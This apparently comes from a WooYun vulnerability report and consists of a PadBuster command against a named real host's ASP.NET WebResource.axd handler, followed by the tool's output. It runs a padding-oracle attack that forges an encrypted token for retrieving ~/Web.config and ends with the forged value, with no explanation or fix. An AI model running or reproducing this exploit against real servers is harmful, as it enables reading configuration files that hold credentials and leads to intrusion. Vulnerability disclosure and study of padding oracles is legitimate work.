WooYun.org

./padBuster.pl http://bid.hnagroup.com/WebResource.axd?d=3QidBs4cs7q9TUMBuN-tMg2 3QidBs4cs7q9TUMBuN-tMg2 16 -encoding=3 -plaintext "|||~/Web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20931
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3881 N/A
2 ** 255 500 4897 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (206) [Byte 16]
[+] Success: (208) [Byte 15]
[+] Success: (91) [Byte 14]
[+] Success: (172) [Byte 13]
[+] Success: (135) [Byte 12]
[+] Success: (72) [Byte 11]
[+] Success: (171) [Byte 10]
[+] Success: (106) [Byte 9]
[+] Success: (228) [Byte 8]
[+] Success: (131) [Byte 7]
[+] Success: (38) [Byte 6]
[+] Success: (202) [Byte 5]
[+] Success: (0) [Byte 4]
[+] Success: (53) [Byte 3]
[+] Success: (67) [Byte 2]
[+] Success: (75) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 27304773e97aec8f4ccf21ecce31b5ce
[+] Intermediate Bytes (HEX): 5b4c3b0dc62d89ed62ac4e82a858d2cf
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: JzBHc-l67I9MzyHszjG1zgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------